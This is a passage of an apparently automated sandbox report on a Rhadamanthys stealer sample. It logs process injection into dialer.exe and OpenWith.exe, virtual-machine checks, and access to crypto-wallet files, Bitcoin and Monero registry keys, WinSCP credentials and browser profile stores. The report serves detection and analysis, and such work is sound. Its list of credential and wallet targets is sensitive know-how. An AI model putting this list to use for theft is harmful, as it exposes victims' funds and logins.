                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02724305 push F693B671h; retf 2_3_0272430A
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027245FC push esi; ret 2_3_02724600
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027221EF push ecx; iretd 2_3_027221FB
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02724FC8 push es; ret 2_3_02724FC9
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02720FCE push eax; retf 2_3_02720FCF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027221AF pushad ; ret 2_3_027221B7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F044CA0 push edx; ret 3_2_00007DF41F044CAB
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F049D1E push esi; retf 000Ah3_2_00007DF41F049D1F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F03ABBE str word ptr [ebp+ecx*4+05h]3_2_00007DF41F03ABBE
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW,3_2_00007DF41F058E20
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0B7344 GetSystemInfo,3_2_00007DF41F0B7344
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppDataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\DefaultJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStoreJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalizationJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\LocalJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\MicrosoftJump to behavior
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2332693555.0000025B16D94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink
                      Source: OpenWith.exe, 00000003.00000003.2327644911.0000025B16FFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                      Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: dialer.exe, 00000002.00000002.2240725076.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331408408.0000025B14E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC2277 mov eax, dword ptr fs:[00000030h]0_3_00CC2277
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_0272027F mov eax, dword ptr fs:[00000030h]2_3_0272027F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00CC0AA0 HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy,0_2_00CC0AA0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,3_2_0000025B14E21A90
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,3_2_00007DF41F04F83C
                      Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: !CP:Defichain-Electrum
                      Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\ElectronCash\config
                      Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus\exodus.wallet
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus\exodus.wallet
                      Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP
                      Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entriesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfbaJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-releaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomedJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsingJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnailsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browserJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.defaultJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\mainJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
